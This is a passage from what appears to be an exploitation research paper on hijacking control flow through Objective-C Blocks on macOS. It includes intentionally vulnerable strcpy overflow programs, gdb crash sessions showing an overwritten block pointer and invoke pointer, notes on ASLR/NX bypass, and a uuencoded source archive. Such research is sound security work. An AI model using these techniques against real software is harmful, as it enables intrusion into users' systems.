the Block is executed. lea rcx, qword [ds:___main_block_invoke_1] mov qword [ss:rbp-0x50+var_32], rcx Earlier we discussed the fact that there are two structures for every Block. The second of these, the block descriptor is pre-created at compile time and stored in the __data section. lea rcx, qword [ds:___block_descriptor_tmp_1.1] mov qword [ss:rbp-0x50+var_40], rcx The struct definition is as follows: static const struct block_descriptor_NAME { unsigned long reserved; unsigned long literal_size; /* helper functions - present only if needed */ void (*copy_helper)(void *dst, void *src); void (*dispose_helper)(void *src); }; Basically the only field we care about most of the time is the literal_size, which contains the total size of the block_literal. The other function pointers are only used in specific cases. The rest of the block literal struct contains the arguments to invoke. A copy of the "multiplier" variable is copied into this struct. mov ecx, dword [ss:rbp-0x50+var_12] mov dword [ss:rbp-0x50+var_48], ecx Now that the literal struct is populated, the code has to invoke the Block passing in the arguments. This is done by retrieving the invoke function pointer from the literal struct populated earlier. I probably should have used an optimization flag when i compiled this, because the next couple of instructions are a little silly. A pointer to the block literal struct is moved into var_0, then moved back into rax... mov qword [ss:rbp-0x50+var_0], rax mov rax, qword [ss:rbp-0x50+var_0] Next the invoke function pointer is moved into rax by dereferencing this pointer and adding 16 (0x10). mov rax, qword [ds:rax+0x10] The pointer to the block literal struct is then moved into rcx. mov rcx, qword [ss:rbp-0x50+var_0] The value being passed to the Block in the printf() call (3) is temporarily moved to edx. mov edx, 0x3 ; arg to block The block_literal struct pointer is moved to rdi, which is the first argument in the x86_64 function calling convention (rdi,rsi,rcx,rdx). mov rdi, rcx The function argument (3) is then moved to esi as the second argument. mov esi, edx Finally the invoke() method is called. invoke(self,3) basically. call rax The rest of the assembly listing is just a call to printf to display the result, followed by the epilogue. mov ecx, eax xor dl, dl lea rdi, qword [ds:0x100000f2c] ; "%d\\n" mov esi, ecx mov al, dl call imp___stubs__printf mov eax, dword [ss:rbp-0x50+var_60] add rsp, 0x50 pop rbp ret As you can see, this process is fairly straight forward, so now that we understand it we can look at how to abuse it. --[ Exploitation In order to demonstrate exploitation scenarios where these Blocks can be utilized i will start by modifying the example code to contain a trivial stack overflow. int main(int ac, char **av) { int multiplier = 7; int (^myBlock)(int) = ^(int num) { return num * multiplier; }; char buf[20]; if(ac != 2) { printf("error: need 2nd arg\n"); exit(1); } strcpy(buf,av[1]); printf("%s: %d\n", buf, myBlock(3)); exit(1); } As you can see, prior to the final printf() a call which copies the first argument to the program into a small stack buffer, without bounds checking, is added. I also added an exit(1); call to demonstrate that this program couldn't necessarily be exploited without utilizing the Block. This also applies to cases where stack cookies (-fstack-protection) are used. As we saw in the previous example, the block_literal structure used will be stored on the stack. Also the myBlock pointer to this structure is stored on the stack in this case. So what happens when we overflow the buf array in this case? Let's run it and see. -[dcbz@squee:~/code/blocks]$ gcc blockof.c -o of -[dcbz@squee:~/code/blocks]$ ./of error: need 2nd arg -[dcbz@squee:~/code/blocks]$ ./of hello hello: 21 -[dcbz@squee:~/code/blocks]$ gdb ./of (gdb) r `perl -e'print "A"x5000'` Starting program: /Users/dcbz/code/blocks/of `perl -e'print "A"x5000'` Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: 13 at address: 0x0000000000000000 0x0000000100000e4e in main () As you can see, running this program with a overly large argument overflows the stack based buffer and we get an EXC_BAD_ACCESS exception. For some reason gdb claims that it happened at address 0x0. However if we do some investigation: (gdb) x/i $pc 0x100000e4e : mov rax,QWORD PTR [rax+0x10] (gdb) i r rax rax 0x4141414141414141 4702111234474983745 We can see that the program is crashing dereferencing the block_literal struct pointer to retrieve the "invoke" pointer. (based on our previous understanding of the assembly listing.) This means we have overwritten the pointer to the block_literal struct with a series of 'A's (0x41). Because the pointer to the struct lies in front of the struct itself we are unable to modify the invoke pointer directly. Therefore we are left with a very similar construct to a C++ vptr dereference. We can exploit this in a very similar fashion. The construct is essentially "call [ptr+0x10]", therefore we need to control memory at a known address in order to place a pointer to our shellcode, then we can use the address of this pointer minus 16 when we overwrite the block_literal struct pointer. This will result in execution flow being redirected to our shellcode. Another solution would be to replace the value of the invoke pointer with another block's invoke method or known function. Then utilize an argument mismatch in a favorable way. Both of these things have been documented numerous times so i'm not going to go into any more detail on this here. Although i will say, in order to control memory at a fixed location, a few techniques might be, to use the shared_region_map_file technique, or disable aslr/nx with posix_spawn for local issues, or use ROP/heapspray for remote issues. Now that we've looked at the stack overflow case, let's look at what happens when the block_literal struct contents are on the heap. To test this basically we can take the test stack overflow we looked at earlier, and this time move the destination of the strcpy() call to the heap. In order to move the Block to the heap we have to utilize a function in the runtime architecture. Basically libSystem is linked to the block library: /usr/lib/system/libsystem_blocks.dylib. This library contains functions for manipulating and displaying Block information. One of the exported functions, "Block_copy" is used to create a copy of the block on the heap and return a pointer to it. This is typically used by functions that need to return a Block, since returning a pointer to a Block on the functions stack would be fail when the stack unwinds. The heap Block is then free()'ed via the Block_release function. To call these functions we need to include the header file "Block.h". The Block_copy function checks what type of block is being passed to it. If the Block was allocated on the heap or .bss it simply returns the Block rather than making a copy. Otherwise a copy is placed on the heap and a pointer returned, as you can see in the example code below: #include #include #include #include int main(int ac, char **av) { char *buf = malloc(20); int multiplier = 7; int (^stackBlock)(int) = ^(int num) { return num * multiplier; }; int (^myBlock)(int) = Block_copy(stackBlock); if(ac != 2) { printf("error: need 2nd arg\n"); exit(1); } strcpy(buf,av[1]); printf("%s: %d\n", buf, myBlock(3)); exit(1); } Now that we have some sample code, let's compile and run it and see where overflowing it gets us. -[dcbz@squee:~/code/blocks]$ gcc bh.c -o bh -[dcbz@squee:~/code/blocks]$ gdb ./bh (gdb) r hi Starting program: /Users/dcbz/code/blocks/bh hi Reading symbols for shared libraries +............................. done hi: 21 As expected running it with the string hi, prints the usual output, this time executing via the heap allocated Block. However if we pass a string of 500 'A's... Program exited with code 01. (gdb) r `perl -e'print "A"x500'` Starting program: /Users/dcbz/code/blocks/bh `perl -e'print "A"x500'` Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: 13 at address: 0x0000000000000000 0x0000000100000dc4 in main () (gdb) x/i $pc 0x100000dc4 : call rax (gdb) i r rax rax 0x4141414141414141 4702111234474983745 As you can see we get a crash again, however this time rather than it dereferencing the block_literal pointer, we have overwritten the invoke() method pointer itself and have directly controlled eip. As you can imagine both these cases are useful when trying to gain control of an overflow, especially in the case of stack or heap canaries, or an unreachable return. --[ Future Research -- Non Pointer ISA Unfortunately, due to the fact that i'm trying to coordinate this paper release with my Infiltrate 2015 talk i am probably not going to have time to fully research this area prior to publication. Basically in the Objective-C runtime on the arm64 the ISA pointer can function as a tagged pointer as well. Due to the nature of the address space there are a significant number of unused bits in the pointer which contain an interesting amount of meta-data. The write-up at [6] clearly explains all this. I will leave the bit pattern below just in case you are interested. I am particularly eager to investigate the has_cxx_dtor attribute, as well as the sidetable reference counting information. (LSB) 1 bit indexed 0 is raw isa, 1 is non-pointer isa. 1 bit has_assoc Object has or once had an associated reference. Object with no associated references can deallocate faster. 1 bit has_cxx_dtor Object has a C++ or ARC destructor. Objects with no destructor can deallocate faster. 30 bits shiftcls Class pointer's non-zero bits. 9 bits magic Equals 0xd2. Used by the debugger to distinguish real objects from uninitialized junk. 1 bit weakly_referenced Object is or once was pointed to by an ARC weak variable. Objects not weakly referenced can deallocate faster. 1 bit deallocating Object is currently deallocating. 1 bit has_sidetable_rc Object's retain count is too large to store inline. 19 bits extra_rc Object's retain count above 1. (For example, if extra_rc is 5 then the object's real retain count is 6.) (MSB) --[ Conclusion Well you made it to the end reader. Hopefully this was useful in some way! Writing is very painful... Thanks for reading! - nemo --[ References [1] The Objective-C Runtime: Understanding and Abusing - http://phrack.org/issues/66/4.html [2] Abusing Performance Optimization Weaknesses to Bypass ASLR - http://www.cc.gatech.edu/~blee303/paper/BH_ASLR_slides.pdf [3] - Lets build tagged pointers: https://www.mikeash.com/pyblog/ \ friday-qa-2012-07-27-lets-build-tagged-pointers.html [4] Apple Block Conceptual - http://developer.apple.com/library/ios/#documentation/cocoa/ \ Conceptual/Blocks/Articles/bxOverview.html#//apple_ref/doc/uid/ \ TP40007502-CH3-SW1 [5] Big Nerd Ranch Advanced Mac OS X Programming: Block - http://www.informit.com/articles/article.aspx?p=1749598&seqNum=12 [6] Non-pointer ISA http://www.sealiesoftware.com/blog/archive/2013/09/24/ \ objc_explain_Non-pointer_isa.html --[ Appendix - Source Code begin 644 code.tgz M'XL(`)7]'U4``^U:6W/3.!3F-?X5(CL%.VU:WYTV9:'1[/%P]+L@G'EABF/7=C!B6H).T&7WW=6_ MV$F%)A)O(F\@^=&P+9SA<"`\](@X[H(%_@>[:&,S_XV"_[IF4?ZK%N=_%L^Y'_,:Q+;>$;-P$_ M&7+^![87[H;]&_FOFJ96BO]4X+]FJ0;G?Q58P?\M0H+?!MCU0HPZYYT_+KJO M_KY`-7FJR1>Z+LO"T1&2I\>RJ[DM$Y^0FL-A2NK-A)Z?=R^Z%V^(R#&9*R@E M"$*2QA,G18[MC#!8GO@S^B+4_"@QQ;`_R1^R-P=ZT!6A.GBJ.N(>= MJ710U./:UYC6A9BI7A+QSC:N).U@BCP>'S.#7:GCJI:)"'K\) M19N7W6X*TC`]/HRJURO>:3U]:-M+__+2T8?W+ULLYZ0^PI"'/D6Q/ZCW2;^* M]O?[J(O3E,A/QBCK:M9^]M:3^]`0Z*#KNHXLMQ$H86`GUT+-C6+1HWD*:B,/ MG9:4%M[WGRELM'E%'JE()&LK/7%PSVLJ9-9JV>,A*"/DYRK\%8G>Z:DJE4N` M8M+F!M@>7&'LMA%D'C7@H]CLHM9QIX7F$$0W"-O3`]#B64D5(>,"+6`[Y4RAW(!:*1>?.+ZMG)@A*>%#?\[U;"S-6`1_S90#*V&GD$^E2L0`'"4[% M)ZYS\/3CU'&>'F1$<1W*,-=SIZ?)?5) MZ[!.DSA$,HFP[C>Z*OM_4W^0^%^33:OP_[IJDOA?D17N_ZO`]_G_RP]OGW_H MO+YXWT7$K\K4^\M3"ZSP\;';:NFZ=4L`P`JVJ'72K2+[[7GW-8+,%IO*=2Z] MY-&5S*-3<\&(31UZGD0\`7/O6T49<1Y:W"$86.'1ER.#V73MEP.#G?GV^83$ M]P9XP>'_/)Z>>7(Z!N)>VVPXX,Y+.I@E[N_/NW2:N.BZ]U%668.$!J!G=(P+ M(C'UY2OJ:2++,`U=U\UVY;[SKB[S+CZ3,`5J(11LUXH8JMSYYYE6K^]^KEH+ MKK4[\MP4REQM6P%,\D*&N/!.NGEZJDMT,==Q"1:X1+RF(N5C+0P%F;9J>_"C M1AUBV6!(5<4@'`^'//Y["_[%!7._BS8VG?^JRNS\E]W_Z:K!X[]*`,;B1*@- M'0V`PRN^1K-0CZ47PX@=DJ(FA%-RN0VBY"-12YDZH+@P$,(S<8! M32K2'WHR?D'D_$_MX1`/=O,S`'G[^W]5`T,!_)=U@]__5X&%]=^)&]AD_W6K ML/^*9FBP_H:AJ-S^5X&2_5]IQ\,$=A(!,]_L^?;2"0TLE5P@>]U&1IV746^7 M@:W-%8Z+=K+7;634>1FU[(W8"&?]GO5FUD9)\J$7[QZPP/]\N>^UC4W\UY3\ M_@_VU/3\SS#X_5\UV'S85Y3H1#%^8:?V4?Y`CP+O<$96WJ5>=L\)T]BF$@]. MT-YD;@,J]41O("DKSX_\R*_WZ9$0WY-^+Y;X7QC6^VMCH__7BO-_Q;)(_&'?7*-RJK, MSL38B_0DG)V3R5/7(F;ALOLF&HIG]74'C+T0Y0EOX)W\_VG[$_P+GG.MX;_Z M8/PW9<9_C?._"ORH_`>M4,I_6_)?ECG_[X0E_A<;N/MK8Q/_35TIXG_=5"C_ M#9/SOPI4R__\KCC9^JXX'7F)E]@W./Y,J,NT,XQ2IJ_D^GBU54CFH@*#7IP5 M[;VGPFCU[6Q1:OT%95*Z?)V[XERZ55MM?I+RO5INK/;.Z@=)Y;N:-?ROU/^; MQ?FO82FFQ?E?(7YT_I\S;$GT[)>?D[`)^LSIS<'!P<'!P<'!P<'!P<'!P<'! /P<'!\